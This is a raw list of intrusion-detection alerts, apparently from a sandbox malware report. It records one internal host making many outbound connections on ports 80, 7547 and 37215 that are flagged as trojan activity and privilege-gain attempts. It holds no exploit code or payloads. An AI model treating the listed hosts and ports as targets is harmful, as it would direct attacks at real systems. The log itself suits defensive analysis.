            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.208.224.2144718802027121 10/23/22-17:58:21.826412
            SID:2027121
            Source Port:44718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.212.40.4760054802846380 10/23/22-17:57:49.035895
            SID:2846380
            Source Port:60054
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.198.95.19743626802027121 10/23/22-17:57:02.420013
            SID:2027121
            Source Port:43626
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.223.39.24847384802846380 10/23/22-17:56:39.305609
            SID:2846380
            Source Port:47384
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23149.96.34.12645698802835221 10/23/22-17:57:38.794574
            SID:2835221
            Source Port:45698
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.203.6947578802027121 10/23/22-17:58:21.830071
            SID:2027121
            Source Port:47578
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2354.191.47.17559730802841623 10/23/22-17:57:16.701947
            SID:2841623
            Source Port:59730
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.113.230.17643946802846457 10/23/22-17:57:59.921521
            SID:2846457
            Source Port:43946
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2370.126.129.1215738075472023548 10/23/22-17:58:11.467563
            SID:2023548
            Source Port:57380
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.228.47.4556432802846380 10/23/22-17:58:39.130268
            SID:2846380
            Source Port:56432
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.173.229.2035368802027121 10/23/22-17:58:12.841339
            SID:2027121
            Source Port:35368
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.77.121.22134920802027121 10/23/22-17:57:16.182729
            SID:2027121
            Source Port:34920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.116.63.24947134802846457 10/23/22-17:58:10.247956
            SID:2846457
            Source Port:47134
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.126.209.2451032802846380 10/23/22-17:57:11.279334
            SID:2846380
            Source Port:51032
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.141.143.15050112802027121 10/23/22-17:58:17.393076
            SID:2027121
            Source Port:50112
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2372.224.53.165895275472023548 10/23/22-17:58:32.325556
            SID:2023548
            Source Port:58952
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23104.69.27.12234794802841623 10/23/22-17:57:25.409148
            SID:2841623
            Source Port:34794
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.62.5.24444888802846380 10/23/22-17:57:38.467376
            SID:2846380
            Source Port:44888
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.211.106.2050420802027121 10/23/22-17:58:21.852505
            SID:2027121
            Source Port:50420
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.215.75.18959232802027121 10/23/22-17:57:57.629258
            SID:2027121
            Source Port:59232
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23176.113.103.19454454802841623 10/23/22-17:57:20.378263
            SID:2841623
            Source Port:54454
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.142.172.24238786802027121 10/23/22-17:57:28.457799
            SID:2027121
            Source Port:38786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.17.224.18260416802846457 10/23/22-17:57:07.079283
            SID:2846457
            Source Port:60416
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.3.76.5746230802027121 10/23/22-17:58:05.207821
            SID:2027121
            Source Port:46230
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.218.185.10243754802846457 10/23/22-17:57:56.017518
            SID:2846457
            Source Port:43754
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.25.111.4435170802846380 10/23/22-17:57:07.339836
            SID:2846380
            Source Port:35170
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2366.39.4.2742812802841623 10/23/22-17:58:39.367963
            SID:2841623
            Source Port:42812
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.64.189.9633426802846380 10/23/22-17:56:39.282434
            SID:2846380
            Source Port:33426
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.5.19460618802027121 10/23/22-17:58:30.360553
            SID:2027121
            Source Port:60618
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.10.1349488802027121 10/23/22-17:57:52.295094
            SID:2027121
            Source Port:49488
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.217.161.8852038802027121 10/23/22-17:58:15.276855
            SID:2027121
            Source Port:52038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.247.109.2546566802846457 10/23/22-17:57:31.330217
            SID:2846457
            Source Port:46566
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.131.28.13339304802027121 10/23/22-17:57:33.463534
            SID:2027121
            Source Port:39304
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.141.96.836304802027121 10/23/22-17:58:39.682437
            SID:2027121
            Source Port:36304
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.223.14.6151966802846380 10/23/22-17:57:07.292473
            SID:2846380
            Source Port:51966
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.84.15.11857298802835221 10/23/22-17:57:38.963880
            SID:2835221
            Source Port:57298
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.59.181.3949176802027121 10/23/22-17:57:34.602784
            SID:2027121
            Source Port:49176
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2352.212.146.24040500802841623 10/23/22-17:57:48.276349
            SID:2841623
            Source Port:40500
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.88.2758636802027121 10/23/22-17:57:23.567467
            SID:2027121
            Source Port:58636
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.221.165.4257110802835222 10/23/22-17:57:40.406047
            SID:2835222
            Source Port:57110
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.142.74.13140848802027121 10/23/22-17:58:12.741253
            SID:2027121
            Source Port:40848
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.135.107.241496802846380 10/23/22-17:57:55.445341
            SID:2846380
            Source Port:41496
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.218.22245658802846457 10/23/22-17:58:37.501336
            SID:2846457
            Source Port:45658
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.148.72.5134752802835222 10/23/22-17:57:20.141409
            SID:2835222
            Source Port:34752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23188.225.77.3434432802846457 10/23/22-17:58:07.947814
            SID:2846457
            Source Port:34432
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.223.97.11250116802846380 10/23/22-17:58:06.179076
            SID:2846380
            Source Port:50116
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.3.27.13148980802027121 10/23/22-17:58:25.356484
            SID:2027121
            Source Port:48980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.19.248.8637522802846457 10/23/22-17:57:08.432868
            SID:2846457
            Source Port:37522
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.128.202.7153272802846380 10/23/22-17:57:38.466341
            SID:2846380
            Source Port:53272
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.67.92.20040860802846380 10/23/22-17:58:39.133161
            SID:2846380
            Source Port:40860
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.13.140.10356510802846457 10/23/22-17:57:00.155795
            SID:2846457
            Source Port:56510
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.211.72.7449486802027121 10/23/22-17:57:34.509756
            SID:2027121
            Source Port:49486
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.224.26.13244288372152835222 10/23/22-17:58:35.150947
            SID:2835222
            Source Port:44288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2377.56.168.325936075472835222 10/23/22-17:58:32.171744
            SID:2835222
            Source Port:59360
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.237.123.11950710802846457 10/23/22-17:57:53.213224
            SID:2846457
            Source Port:50710
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2368.183.20.5556204802841623 10/23/22-17:57:16.524200
            SID:2841623
            Source Port:56204
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.161.239.16346156802027121 10/23/22-17:56:58.387449
            SID:2027121
            Source Port:46156
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.235.181.25355410802027121 10/23/22-17:56:55.681778
            SID:2027121
            Source Port:55410
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2342.200.190.18251968802841623 10/23/22-17:57:25.783579
            SID:2841623
            Source Port:51968
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.173.185.25238478802027121 10/23/22-17:57:18.747060
            SID:2027121
            Source Port:38478
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.184.61.16039982802027121 10/23/22-17:57:16.134908
            SID:2027121
            Source Port:39982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.226.149.10748668802027121 10/23/22-17:58:02.198971
            SID:2027121
            Source Port:48668
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.208.96.16545410802846380 10/23/22-17:56:55.691471
            SID:2846380
            Source Port:45410
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.60.17738572802027121 10/23/22-17:57:49.525063
            SID:2027121
            Source Port:38572
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.99.248.6960762802027121 10/23/22-17:57:47.237870
            SID:2027121
            Source Port:60762
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.24.137.11456988802846380 10/23/22-17:57:43.288432
            SID:2846380
            Source Port:56988
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.71.226.18737474802846457 10/23/22-17:56:52.704313
            SID:2846457
            Source Port:37474
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.130.243.11357042802027121 10/23/22-17:58:12.780192
            SID:2027121
            Source Port:57042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.100.242.14060258802027121 10/23/22-17:58:15.244265
            SID:2027121
            Source Port:60258
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.100.83.16753580802027121 10/23/22-17:57:28.440574
            SID:2027121
            Source Port:53580
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.43.31.5457864802846457 10/23/22-17:58:32.908012
            SID:2846457
            Source Port:57864
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.238.97.20740734802846380 10/23/22-17:58:39.797960
            SID:2846380
            Source Port:40734
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.208.51.13651970802846380 10/23/22-17:57:38.461146
            SID:2846380
            Source Port:51970
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.52.121.1442538802846380 10/23/22-17:56:55.685929
            SID:2846380
            Source Port:42538
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.1.67.6940388802841623 10/23/22-17:57:48.303753
            SID:2841623
            Source Port:40388
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.234.29.10749996802841623 10/23/22-17:57:16.579158
            SID:2841623
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.92.18.12436016802841623 10/23/22-17:57:31.468482
            SID:2841623
            Source Port:36016
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.33.180.15156192802846380 10/23/22-17:58:13.127638
            SID:2846380
            Source Port:56192
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.17.125.2734058802846457 10/23/22-17:58:37.499647
            SID:2846457
            Source Port:34058
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.66.14743244802027121 10/23/22-17:57:16.237386
            SID:2027121
            Source Port:43244
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.27.9.2474236475472023548 10/23/22-17:58:32.415987
            SID:2023548
            Source Port:42364
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.160.247.15059220802027121 10/23/22-17:57:01.189457
            SID:2027121
            Source Port:59220
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.193.147.14457282802027121 10/23/22-17:57:05.148137
            SID:2027121
            Source Port:57282
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.129.213.11050132802027121 10/23/22-17:58:17.300669
            SID:2027121
            Source Port:50132
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23189.111.98.2384302675472023548 10/23/22-17:57:25.383642
            SID:2023548
            Source Port:43026
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.84.236.4458066802841623 10/23/22-17:57:28.583889
            SID:2841623
            Source Port:58066
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.151.48.19352490802027121 10/23/22-17:57:49.412044
            SID:2027121
            Source Port:52490
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.226.104.2650440802846457 10/23/22-17:58:23.986617
            SID:2846457
            Source Port:50440
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.49.25.22253704802027121 10/23/22-17:57:31.203571
            SID:2027121
            Source Port:53704
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.128.181.24648740802846457 10/23/22-17:57:41.270057
            SID:2846457
            Source Port:48740
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.94.95.13033366802846457 10/23/22-17:58:04.249275
            SID:2846457
            Source Port:33366
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2373.36.116.16655264802841623 10/23/22-17:56:55.929374
            SID:2841623
            Source Port:55264
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.59.227.5558258802846457 10/23/22-17:57:07.097568
            SID:2846457
            Source Port:58258
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.72.41.18337150802027121 10/23/22-17:58:29.927222
            SID:2027121
            Source Port:37150
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.217.26.22434290802027121 10/23/22-17:56:46.624349
            SID:2027121
            Source Port:34290
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.155.193.23155812802846457 10/23/22-17:56:52.414039
            SID:2846457
            Source Port:55812
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.241.31.13659352802846457 10/23/22-17:57:16.952970
            SID:2846457
            Source Port:59352
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.56.34.2936972802846457 10/23/22-17:57:43.757423
            SID:2846457
            Source Port:36972
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.119.66.23745970802846380 10/23/22-17:57:18.693354
            SID:2846380
            Source Port:45970
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.59.128.24235482802027121 10/23/22-17:57:25.848350
            SID:2027121
            Source Port:35482
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.128.230.234146802846380 10/23/22-17:58:13.614230
            SID:2846380
            Source Port:34146
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.90.175.16846254802027121 10/23/22-17:58:29.972026
            SID:2027121
            Source Port:46254
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.247.164.4550144802846457 10/23/22-17:57:18.395660
            SID:2846457
            Source Port:50144
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.109.69.25039654802846457 10/23/22-17:58:24.002096
            SID:2846457
            Source Port:39654
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.87.225.10358326802846457 10/23/22-17:57:09.723251
            SID:2846457
            Source Port:58326
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.25.212.3157758802841623 10/23/22-17:57:11.163825
            SID:2841623
            Source Port:57758
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.41.23738134802027121 10/23/22-17:57:21.242418
            SID:2027121
            Source Port:38134
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.163.67.23150856802846380 10/23/22-17:58:06.232008
            SID:2846380
            Source Port:50856
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.106.200.7137496802846457 10/23/22-17:57:41.163628
            SID:2846457
            Source Port:37496
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.19.151.13534012802846457 10/23/22-17:57:20.946574
            SID:2846457
            Source Port:34012
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.190.73.21537404802846457 10/23/22-17:57:46.324510
            SID:2846457
            Source Port:37404
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.15.8346436802027121 10/23/22-17:56:51.012002
            SID:2027121
            Source Port:46436
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2379.118.143.15746958802835221 10/23/22-17:57:07.465546
            SID:2835221
            Source Port:46958
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.70.194.6449750802027121 10/23/22-17:56:58.434241
            SID:2027121
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.188.241.14644786802846380 10/23/22-17:58:09.688025
            SID:2846380
            Source Port:44786
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.108.249.9655778802846380 10/23/22-17:57:48.551671
            SID:2846380
            Source Port:55778
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.129.107.3648562802027121 10/23/22-17:57:38.630374
            SID:2027121
            Source Port:48562
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.183.133.18837906802846380 10/23/22-17:58:27.333501
            SID:2846380
            Source Port:37906
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.12.185.18435168802846380 10/23/22-17:56:58.275907
            SID:2846380
            Source Port:35168
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.17.6.9857472802846457 10/23/22-17:58:05.442861
            SID:2846457
            Source Port:57472
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2341.230.66.23041250372152835222 10/23/22-17:57:33.709636
            SID:2835222
            Source Port:41250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.61.246.10259560802027121 10/23/22-17:57:56.453122
            SID:2027121
            Source Port:59560
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.241.118.18548470802841623 10/23/22-17:57:31.972792
            SID:2841623
            Source Port:48470
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.154.228.17756888802027121 10/23/22-17:58:07.315986
            SID:2027121
            Source Port:56888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.58.14052542802027121 10/23/22-17:56:53.276555
            SID:2027121
            Source Port:52542
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.216.148.23446042802027121 10/23/22-17:58:27.444277
            SID:2027121
            Source Port:46042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.9.77.5956230802027121 10/23/22-17:57:21.077046
            SID:2027121
            Source Port:56230
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23192.144.163.18360784802841623 10/23/22-17:58:03.707662
            SID:2841623
            Source Port:60784
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.47.56.5233112802846457 10/23/22-17:58:07.871806
            SID:2846457
            Source Port:33112
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.245.217.8242670802846380 10/23/22-17:58:35.727279
            SID:2846380
            Source Port:42670
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.82.122.18033538802846457 10/23/22-17:56:52.718010
            SID:2846457
            Source Port:33538
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.194.16335948802027121 10/23/22-17:57:23.604253
            SID:2027121
            Source Port:35948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.78.116.14839206802846380 10/23/22-17:57:40.734862
            SID:2846380
            Source Port:39206
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.133.224.13333140802846380 10/23/22-17:56:58.132191
            SID:2846380
            Source Port:33140
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.139.84.13934884802846380 10/23/22-17:57:54.130896
            SID:2846380
            Source Port:34884
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.221.16433512802027121 10/23/22-17:58:05.162720
            SID:2027121
            Source Port:33512
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.254.117.18558668802846380 10/23/22-17:58:27.251690
            SID:2846380
            Source Port:58668
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.89.4.4241694802027121 10/23/22-17:58:12.771738
            SID:2027121
            Source Port:41694
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.129.205.10849678802027121 10/23/22-17:58:30.352051
            SID:2027121
            Source Port:49678
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2366.39.4.2742812802835221 10/23/22-17:58:39.367963
            SID:2835221
            Source Port:42812
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.4.212.10541990802846457 10/23/22-17:58:15.321404
            SID:2846457
            Source Port:41990
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23193.28.249.25459992802835222 10/23/22-17:57:04.344271
            SID:2835222
            Source Port:59992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.244.197.338410802835221 10/23/22-17:58:21.114648
            SID:2835221
            Source Port:38410
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.39.252.19655016802846457 10/23/22-17:57:41.166469
            SID:2846457
            Source Port:55016
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.152.55.249582802846380 10/23/22-17:58:00.630473
            SID:2846380
            Source Port:49582
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.94.8.14139860802027121 10/23/22-17:58:09.767578
            SID:2027121
            Source Port:39860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.93.233.10545820802835222 10/23/22-17:57:04.336595
            SID:2835222
            Source Port:45820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.21.24.17650304802846380 10/23/22-17:58:04.042717
            SID:2846380
            Source Port:50304
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.249.24643308802027121 10/23/22-17:58:15.238499
            SID:2027121
            Source Port:43308
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.208.102.13842900802846457 10/23/22-17:58:17.723277
            SID:2846457
            Source Port:42900
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.59.51.2257014802846380 10/23/22-17:58:27.289965
            SID:2846380
            Source Port:57014
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.61.47.20333058802846380 10/23/22-17:57:22.414853
            SID:2846380
            Source Port:33058
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.230.101.10348538802027121 10/23/22-17:58:05.346267
            SID:2027121
            Source Port:48538
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
